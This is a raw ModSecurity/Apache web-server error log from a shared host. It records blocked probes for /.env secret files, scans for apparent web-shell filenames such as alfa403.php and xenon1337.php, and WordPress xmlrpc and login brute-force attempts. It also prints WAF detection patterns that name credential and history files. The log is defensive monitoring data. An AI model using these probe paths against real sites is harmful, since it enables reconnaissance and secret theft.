[Tue May 26 16:36:06.591110 2026] [security2:error] [pid 808625:tid 808784] [client 176.65.139.229:16850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sre.onesoft.in"] [uri "/.env"] [unique_id "ahV-njEl_SBaWibfDmpmuwAAAB0"]
[Tue May 26 16:36:06.874099 2026] [security2:error] [pid 808625:tid 808765] [client 4.204.220.190:32202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahV-njEl_SBaWibfDmpmxwAAAAo"]
[Tue May 26 16:36:06.874223 2026] [security2:error] [pid 808625:tid 808765] [client 4.204.220.190:32202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahV-njEl_SBaWibfDmpmxwAAAAo"]
[Tue May 26 16:36:07.109953 2026] [security2:error] [pid 808625:tid 808849] [client 114.119.131.139:38729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahV-nzEl_SBaWibfDmpmzAAAAF4"], referer: https://rezwanul.blogspot.com/2014/04/?m=0
[Tue May 26 16:36:07.174088 2026] [security2:error] [pid 808625:tid 808819] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-njEl_SBaWibfDmpmvAAAAEA"]
[Tue May 26 16:36:07.833464 2026] [core:error] [pid 808625:tid 808850] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:07.833485 2026] [core:error] [pid 808625:tid 808850] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:07.928383 2026] [security2:error] [pid 808625:tid 808808] [client 176.65.139.238:37306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-nzEl_SBaWibfDmpm3gAAADU"]
[Tue May 26 16:36:07.959096 2026] [core:error] [pid 808625:tid 808847] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:07.959117 2026] [core:error] [pid 808625:tid 808847] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:36:08.079218 2026] [security2:error] [pid 808625:tid 808792] [client 176.65.139.236:26924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kumarindustry.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-oDEl_SBaWibfDmpm5AAAACU"]
[Tue May 26 16:36:08.094557 2026] [security2:error] [pid 808625:tid 808806] [client 176.65.139.232:28726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "observance111.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-oDEl_SBaWibfDmpm5QAAADM"]
[Tue May 26 16:36:08.223644 2026] [security2:error] [pid 808625:tid 808785] [client 117.198.37.168:60100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-oDEl_SBaWibfDmpm6AAAAB4"]
[Tue May 26 16:36:08.223757 2026] [security2:error] [pid 808625:tid 808785] [client 117.198.37.168:60100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-oDEl_SBaWibfDmpm6AAAAB4"]
[Tue May 26 16:36:08.259456 2026] [security2:error] [pid 808625:tid 808763] [client 176.65.139.229:47106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "maharajancars.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahV-oDEl_SBaWibfDmpm6QAAAAg"]
[Tue May 26 16:36:09.026022 2026] [security2:error] [pid 808625:tid 808861] [client 4.204.220.190:27489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahV-oTEl_SBaWibfDmpm_AAAAGo"]
[Tue May 26 16:36:09.026176 2026] [security2:error] [pid 808625:tid 808861] [client 4.204.220.190:27489] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahV-oTEl_SBaWibfDmpm_AAAAGo"]
[Tue May 26 16:36:09.162255 2026] [security2:error] [pid 808625:tid 808874] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-oDEl_SBaWibfDmpm8gAAAHc"]
[Tue May 26 16:36:09.229734 2026] [security2:error] [pid 808625:tid 808665] [remote 74.7.241.15:59934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-fmh.php"] [unique_id "ahV-oTEl_SBaWibfDmpnAgAAXSc"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:36:09.444236 2026] [security2:error] [pid 808625:tid 808787] [client 4.204.220.190:23809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahV-oTEl_SBaWibfDmpnBgAAACA"]
[Tue May 26 16:36:09.444363 2026] [security2:error] [pid 808625:tid 808787] [client 4.204.220.190:23809] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahV-oTEl_SBaWibfDmpnBgAAACA"]
[Tue May 26 16:36:10.136291 2026] [security2:error] [pid 808625:tid 808873] [client 62.60.130.233:64643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bramas.in"] [uri "/wp-login.php"] [unique_id "ahV-ojEl_SBaWibfDmpnFgAAAHY"], referer: https://twitter.com/
[Tue May 26 16:36:10.466250 2026] [security2:error] [pid 808625:tid 808791] [client 62.60.130.233:58174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bramas.in"] [uri "/wp-login.php"] [unique_id "ahV-ojEl_SBaWibfDmpnIgAAACQ"]
[Tue May 26 16:36:11.271511 2026] [security2:error] [pid 808625:tid 808874] [client 4.204.220.190:43858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahV-ozEl_SBaWibfDmpnMAAAAHc"]
[Tue May 26 16:36:11.271655 2026] [security2:error] [pid 808625:tid 808874] [client 4.204.220.190:43858] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahV-ozEl_SBaWibfDmpnMAAAAHc"]
[Tue May 26 16:36:11.759347 2026] [security2:error] [pid 808625:tid 808813] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ozEl_SBaWibfDmpnLgAAADo"]
[Tue May 26 16:36:12.349731 2026] [security2:error] [pid 808625:tid 808828] [client 4.204.220.190:43848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahV-pDEl_SBaWibfDmpnRgAAAEk"]
[Tue May 26 16:36:12.349823 2026] [security2:error] [pid 808625:tid 808828] [client 4.204.220.190:43848] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahV-pDEl_SBaWibfDmpnRgAAAEk"]
[Tue May 26 16:36:12.759864 2026] [security2:error] [pid 808625:tid 808859] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-pDEl_SBaWibfDmpnSAAAAGg"]
[Tue May 26 16:36:13.957944 2026] [security2:error] [pid 808625:tid 808807] [client 206.232.5.110:46973] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV-pTEl_SBaWibfDmpnWAAAADQ"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 16:36:14.658016 2026] [security2:error] [pid 808625:tid 808845] [client 4.204.220.190:23822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahV-pjEl_SBaWibfDmpncgAAAFo"]
[Tue May 26 16:36:14.658136 2026] [security2:error] [pid 808625:tid 808845] [client 4.204.220.190:23822] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahV-pjEl_SBaWibfDmpncgAAAFo"]
[Tue May 26 16:36:15.216899 2026] [security2:error] [pid 808625:tid 808781] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-pjEl_SBaWibfDmpnbQAAABo"]
[Tue May 26 16:36:15.897956 2026] [security2:error] [pid 808625:tid 808796] [client 4.204.220.190:43902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahV-pzEl_SBaWibfDmpnhQAAACk"]
[Tue May 26 16:36:15.898095 2026] [security2:error] [pid 808625:tid 808796] [client 4.204.220.190:43902] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahV-pzEl_SBaWibfDmpnhQAAACk"]
[Tue May 26 16:36:17.610073 2026] [security2:error] [pid 808625:tid 808834] [client 117.198.37.168:60406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-qTEl_SBaWibfDmpntgAAAE8"]
[Tue May 26 16:36:17.610179 2026] [security2:error] [pid 808625:tid 808834] [client 117.198.37.168:60406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-qTEl_SBaWibfDmpntgAAAE8"]
[Tue May 26 16:36:17.742160 2026] [security2:error] [pid 808625:tid 808774] [client 4.204.220.190:32974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahV-qTEl_SBaWibfDmpnuAAAABM"]
[Tue May 26 16:36:17.742285 2026] [security2:error] [pid 808625:tid 808774] [client 4.204.220.190:32974] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahV-qTEl_SBaWibfDmpnuAAAABM"]
[Tue May 26 16:36:18.365510 2026] [security2:error] [pid 808625:tid 808760] [client 4.204.220.190:32254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahV-qjEl_SBaWibfDmpnwAAAAAU"]
[Tue May 26 16:36:18.365667 2026] [security2:error] [pid 808625:tid 808760] [client 4.204.220.190:32254] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahV-qjEl_SBaWibfDmpnwAAAAAU"]
[Tue May 26 16:36:18.657171 2026] [security2:error] [pid 808625:tid 808868] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-qDEl_SBaWibfDmpnnQAAAHE"]
[Tue May 26 16:36:18.842849 2026] [security2:error] [pid 808625:tid 808832] [client 4.204.220.190:41917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahV-qjEl_SBaWibfDmpnxwAAAE0"]
[Tue May 26 16:36:18.842929 2026] [security2:error] [pid 808625:tid 808832] [client 4.204.220.190:41917] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahV-qjEl_SBaWibfDmpnxwAAAE0"]
[Tue May 26 16:36:20.228343 2026] [security2:error] [pid 808625:tid 808794] [client 146.174.188.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-qzEl_SBaWibfDmpnzgAAACc"]
[Tue May 26 16:36:20.610419 2026] [security2:error] [pid 808625:tid 808833] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-qzEl_SBaWibfDmpn1gAAAE4"]
[Tue May 26 16:36:21.555416 2026] [security2:error] [pid 808625:tid 808874] [client 4.204.220.190:33006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahV-rTEl_SBaWibfDmpoDwAAAHc"]
[Tue May 26 16:36:21.555534 2026] [security2:error] [pid 808625:tid 808874] [client 4.204.220.190:33006] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahV-rTEl_SBaWibfDmpoDwAAAHc"]
[Tue May 26 16:36:22.069274 2026] [security2:error] [pid 808625:tid 808692] [remote 103.145.62.145:45388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahV-rTEl_SBaWibfDmpoEgAAFkI"]
[Tue May 26 16:36:22.231715 2026] [security2:error] [pid 808625:tid 808873] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-rDEl_SBaWibfDmpn8wAAAHY"]
[Tue May 26 16:36:23.379457 2026] [security2:error] [pid 808625:tid 808840] [client 4.204.220.190:10503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahV-rzEl_SBaWibfDmpoMAAAAFU"]
[Tue May 26 16:36:23.379544 2026] [security2:error] [pid 808625:tid 808840] [client 4.204.220.190:10503] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahV-rzEl_SBaWibfDmpoMAAAAFU"]
[Tue May 26 16:36:24.857492 2026] [security2:error] [pid 808625:tid 808813] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-rzEl_SBaWibfDmpoKQAAADo"]
[Tue May 26 16:36:24.867938 2026] [security2:error] [pid 808625:tid 808827] [client 4.204.220.190:38454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahV-sDEl_SBaWibfDmpoTgAAAEg"]
[Tue May 26 16:36:24.868051 2026] [security2:error] [pid 808625:tid 808827] [client 4.204.220.190:38454] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahV-sDEl_SBaWibfDmpoTgAAAEg"]
[Tue May 26 16:36:26.480646 2026] [security2:error] [pid 808625:tid 808882] [client 4.204.220.190:10498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahV-sjEl_SBaWibfDmpoZQAAAH8"]
[Tue May 26 16:36:26.480777 2026] [security2:error] [pid 808625:tid 808882] [client 4.204.220.190:10498] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahV-sjEl_SBaWibfDmpoZQAAAH8"]
[Tue May 26 16:36:27.012516 2026] [security2:error] [pid 808625:tid 808855] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-sDEl_SBaWibfDmpoTQAAAGQ"]
[Tue May 26 16:36:28.296995 2026] [security2:error] [pid 808625:tid 808823] [client 117.198.37.168:60720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-tDEl_SBaWibfDmpohgAAAEQ"]
[Tue May 26 16:36:28.297185 2026] [security2:error] [pid 808625:tid 808823] [client 117.198.37.168:60720] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-tDEl_SBaWibfDmpohgAAAEQ"]
[Tue May 26 16:36:28.599797 2026] [security2:error] [pid 808625:tid 808763] [client 4.204.220.190:42599] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahV-tDEl_SBaWibfDmpojgAAAAg"]
